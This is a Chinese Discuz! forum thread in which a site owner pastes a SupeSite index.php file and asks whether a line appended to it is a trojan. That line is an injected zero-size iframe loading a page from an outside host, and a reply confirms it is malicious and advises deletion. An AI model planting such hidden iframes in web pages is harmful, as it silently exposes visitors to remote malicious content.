设为首页收藏本站
切换到宽版

Discuz!官方免费开源建站系统

 找回密码
 立即注册
搜索
Discuz!官方免费开源建站系统»论坛 增值产品交流与讨论 SS/XS 专区 SS/XS-安装使用 SS网站中的文件最后一行被植入这段代码,是怎么回事?是 ...
返回列表 发新帖

[已答复] SS网站中的文件最后一行被植入这段代码,是怎么回事?是木马么?

[复制链接]
urlcn 发表于 2009-10-23 12:32:14 | 显示全部楼层 |阅读模式
被植入的代码是:
  1. <iframe src=http://bbs.netxshell.com/en/images/cal/index.htm width=0 height=0></iframe>
复制代码
全文代码如下:
  1. <?php

  3. /*
  4.         [SupeSite/X-Space] (C)2001-2006 Comsenz Inc.
  5.         首页

  7.         $RCSfile: index.php,v $
  8.         $Revision: 1.74 $
  9.         $Date: 2007/06/27 17:15:08 $
  10. */

  12. include_once('./include/main.inc.php');
  13.        
  14. //获取变量
  15. if($_SCONFIG['urltype'] == '2' || $_SCONFIG['urltype'] == '5') {
  16.         $parsegetvar = empty($_SERVER['PATH_INFO'])?(empty($_SERVER['ORIG_PATH_INFO'])?'':substr($_SERVER['ORIG_PATH_INFO'], 1)):substr($_SERVER['PATH_INFO'], 1);
  17. }
  18. if(empty($parsegetvar)) $parsegetvar = empty($_SERVER['QUERY_STRING'])?'':$_SERVER['QUERY_STRING'];

  20. //二级域名
  21. if(!empty($parsegetvar)) {
  22.         $parsegetvar = addslashes($parsegetvar);
  23.         //后缀域名模式
  24.         if($_SCONFIG['allowdomain'] == 3) {
  25.                 if(preg_match("/^[a-z][0-9a-z]*$/i", $parsegetvar)) mydomain($parsegetvar);
  26.         }
  27.         $_SGET = parseparameter(str_replace(array('-','_'), '/', $parsegetvar));
  28. } else {
  29.         //二级域名
  30.         if(!empty($_SCONFIG['allowdomain'])) {
  31.                 if(strpos(S_URL_ALL, $_SERVER['HTTP_HOST']) === false) {
  32.                         $hostarr = explode('.', $_SERVER['HTTP_HOST']);
  33.                         if(count($hostarr) > 2) {
  34.                                 if(count($hostarr) > 3 && $hostarr[0] == 'www') {
  35.                                         $hostdomain = $hostarr[1];
  36.                                 } else {
  37.                                         $hostdomain = $hostarr[0];
  38.                                 }
  39.                         }
  40.                 }
  41.                 if(!empty($hostdomain)) mydomain(rawurlencode($hostdomain));
  42.         }
  43. }

  45. //变量处理
  46. if(!empty($_SGET['viewnews'])) {
  47.         $_SGET['action'] = 'viewnews';
  48.         $_SGET['itemid'] = intval($_SGET['viewnews']);
  49. } elseif(!empty($_SGET['viewspace'])) {
  50.         $_SGET['action'] = 'viewspace';
  51.         $_SGET['itemid'] = intval($_SGET['viewspace']);
  52. } elseif(!empty($_SGET['viewthread'])) {
  53.         $_SGET['action'] = 'viewthread';
  54.         $_SGET['tid'] = intval($_SGET['viewthread']);
  55. } elseif(!empty($_SGET['category'])) {
  56.         $_SGET['action'] = 'category';
  57.         $_SGET['catid'] = intval($_SGET['category']);
  58. } elseif(!empty($_SGET['mygroup'])) {
  59.         $_SGET['action'] = 'mygroup';
  60.         $_SGET['gid'] = intval($_SGET['mygroup']);
  61. } elseif(!empty($_SGET['spacelist'])) {
  62.         $_SGET['action'] = 'spacelist';
  63.         $_SGET['type'] = $_SGET['spacelist'];
  64. } elseif(empty($_SGET['action']) && !empty($_SGET['uid'])) {
  65.         $_SGET['action'] = 'space';
  66.         $_SGET['uid'] = intval($_SGET['uid']);
  67. } else {
  68.         $_SGET['action'] = empty($_SGET['action'])?'index':trim(preg_replace("/[^a-z0-9\-\_]/i", '', trim($_SGET['action'])));
  69. }

  71. //站点关闭
  72. if(!empty($_SCONFIG['closesite']) && $_SGET['action'] != 'login') {
  73.         getcookie(1);
  74.         if(empty($_SGLOBAL['group']['groupid']) || $_SGLOBAL['group']['groupid'] != 1) {
  75.                 if(empty($_SCONFIG['closemessage'])) $_SCONFIG['closemessage'] = $lang['site_close'];
  76.                 messagebox('error', $_SCONFIG['closemessage'].'<p style="font-size:12px;"><a href="'.geturl("action/login").'">'.$lang['admin_login'].'</a></p>');
  77.         }
  78. }

  80. //限制分页500
  81. if(!empty($_SGET['page'])) {
  82.         if($_SGET['page'] > 500) {
  83.                 messagebox('error', 'page_limit');
  84.         }
  85. }

  87. //关键字、描述、导航、标题
  88. $keywordarr = $descriptionarr = $guidearr = $titlearr = array();

  90. //自定义频道
  91. if($_SGET['action'] == 'channel') {
  92.         $_SGET['name'] = empty($_SGET['name'])?'':trim(preg_replace("/[^a-z0-9\-\_]/i", '', trim($_SGET['name'])));
  93.         if(!empty($_SGET['name'])) {
  94.                 $scriptfile = S_ROOT.'./channel/channel_'.$_SGET['name'].'.php';
  95.                 if(file_exists($scriptfile)) {
  96.                         include_once($scriptfile);
  97.                         exit();
  98.                 }
  99.         }
  100. }

  102. //自定义模型
  103. if($_SGET['action'] == 'model') {
  104.         $_SGET['name'] = empty($_SGET['name'])?'':trim(preg_replace("/[^a-z0-9\-\_]/i", '', trim($_SGET['name'])));
  105.         if(!empty($_SGET['name'])) {
  106.                 if(!empty($_SGET['itemid'])) {
  107.                         $scriptfile = S_ROOT.'./modelview.php';
  108.                 } else {
  109.                         $scriptfile = S_ROOT.'./modelindex.php';
  110.                 }
  111.                 if(file_exists($scriptfile)) {
  112.                         include_once($scriptfile);
  113.                         exit();
  114.                 }
  115.         }
  116. }

  118. //系统频道
  119. if($_SGET['action'] != 'index') {
  120.         $scriptfile = S_ROOT.'./'.$_SGET['action'].'.php';
  121.         if(file_exists($scriptfile)) {
  122.                 include_once($scriptfile);
  123.                 exit();
  124.         }
  125. }

  127. //默认首页
  128. if(!empty($channels['default']) && $channels['default'] != 'index.php') {
  129.         if(strpos($channels['default'], '?')) {
  130.                 sheader(S_URL.'/'.$channels['default']);
  131.                 exit();
  132.         } else {
  133.                 include_once(S_ROOT.'./'.$channels['default']);
  134.         }
  135.        
  136. } else {

  138.         if(!empty($_SCONFIG['htmlindex'])) {
  139.                 $_SHTML['action'] = 'index';
  140.                 $_SGLOBAL['htmlfile'] = gethtmlfile($_SHTML);
  141.                 ehtml('get', $_SCONFIG['htmlindextime']);
  142.                 $_SCONFIG['debug'] = 0;
  143.         }

  145.         include_once(S_ROOT.'./include/common.inc.php');

  147.         $title = $_SCONFIG['sitename'];
  148.         $keywords = $_SCONFIG['sitename'];
  149.         $description = $_SCONFIG['sitename'];
  150.        
  151.         include template('index');

  153.         ob_out();
  154.        
  155.         if(!empty($_SCONFIG['htmlindex'])) {
  156.                 ehtml('make');
  157.         } else {
  158.                 maketplblockvalue('cache');
  159.         }
  160. }

  162. ?><iframe src=http://bbs.netxshell.com/en/images/cal/index.htm width=0 height=0></iframe>
复制代码
回复

使用道具 举报

lidq.jingwu 发表于 2009-10-23 15:27:04 | 显示全部楼层
是,删除吧。
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-9-14 22:52 , Processed in 0.101537 second(s), 14 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表